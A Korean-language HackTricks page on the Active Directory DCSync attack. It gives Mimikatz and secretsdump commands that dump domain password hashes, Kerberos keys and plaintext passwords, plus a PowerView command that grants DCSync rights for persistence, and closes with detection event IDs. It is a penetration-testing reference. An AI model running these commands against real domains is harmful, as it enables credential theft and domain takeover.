DCSync

Trickest를 사용하여 세계에서 가장 고급 커뮤니티 도구를 활용한 워크플로우를 쉽게 구축하고 자동화하세요. 오늘 바로 액세스하세요:

Automate OffSec, EASM, and Custom Security Processes | Trickest

제로부터 영웅이 될 때까지 AWS 해킹을 배우세요 htARTE (HackTricks AWS Red Team Expert)!

HackTricks를 지원하는 다른 방법:

회사가 HackTricks에 광고되길 원하거나 PDF로 HackTricks 다운로드하려면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 스왜그를 얻으세요
The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
**💬 Discord 그룹 또는 텔레그램 그룹에 가입하거나 트위터 🐦 @carlospolopm를 팔로우하세요.
HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.

DCSync

DCSync 권한은 도메인 자체에 대한 다음 권한을 가리킵니다: DS-Replication-Get-Changes, Replicating Directory Changes All 및 Replicating Directory Changes In Filtered Set.

DCSync에 대한 중요 사항:

DCSync 공격은 도메인 컨트롤러의 동작을 모방하고 다른 도메인 컨트롤러에게 정보를 복제하도록 요청하는 것을 의미하며, 이는 디렉터리 복제 서비스 원격 프로토콜(MS-DRSR)을 사용합니다. MS-DRSR은 Active Directory의 유효하고 필수 기능이므로 끌 수나 비활성화할 수 없습니다.
기본적으로 도메인 관리자, 엔터프라이즈 관리자, 관리자 및 도메인 컨트롤러 그룹에만 필요한 권한이 부여됩니다.
임의 암호가 역방향 암호화로 저장된 경우 Mimikatz에는 암호를 평문으로 반환하는 옵션이 있습니다.

열거

powerview를 사용하여 이러한 권한을 가진 사용자를 확인하세요:

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

로컬 취약점 악용

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

원격으로 악용

secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking

-just-dc는 3개의 파일을 생성합니다:

NTLM 해시가 포함된 파일 하나
Kerberos 키가 포함된 파일 하나
NTDS의 암호를 평문으로 포함하는 파일 하나. 이 파일은 reversible encryption이 활성화된 계정에 대한 것입니다. 역방향 암호화가 설정된 사용자는 다음과 같이 확인할 수 있습니다.

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

지속성

도메인 관리자인 경우, powerview를 사용하여 이 권한을 어떤 사용자에게든 부여할 수 있습니다:

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose

그럼, 사용자가 올바르게 할당되었는지 확인할 수 있습니다. 이를 확인하기 위해 출력에서 해당 권한을 찾아보세요 ("ObjectType" 필드 내에서 권한 이름을 볼 수 있어야 함):

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}

방지

보안 이벤트 ID 4662 (객체에 대한 감사 정책이 활성화되어야 함) - 객체에 대한 작업이 수행되었습니다.
보안 이벤트 ID 5136 (객체에 대한 감사 정책이 활성화되어야 함) - 디렉터리 서비스 객체가 수정되었습니다.
보안 이벤트 ID 4670 (객체에 대한 감사 정책이 활성화되어야 함) - 객체의 권한이 변경되었습니다.
AD ACL 스캐너 - ACL의 생성 및 비교 보고서 생성. https://github.com/canix1/ADACLScanner

참고 자료

제로부터 영웅이 될 때까지 AWS 해킹 배우기 htARTE (HackTricks AWS Red Team Expert)!

HackTricks를 지원하는 다른 방법:

회사가 HackTricks에 광고되길 원하거나 PDF로 HackTricks를 다운로드하고 싶다면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 스왜그를 구매하세요
The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
💬 디스코드 그룹 또는 텔레그램 그룹에 가입하거나 트위터** 🐦 @carlospolopm를 팔로우하세요.
HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하여 해킹 요령을 공유하세요.

Trickest를 사용하여 세계에서 가장 고급 커뮤니티 도구로 구동되는 워크플로우를 쉽게 구축하고 자동화하세요. 오늘 바로 액세스하세요:

Automate OffSec, EASM, and Custom Security Processes | Trickest

PreviousDCShadow NextDiamond Ticket

Last updated 3 days ago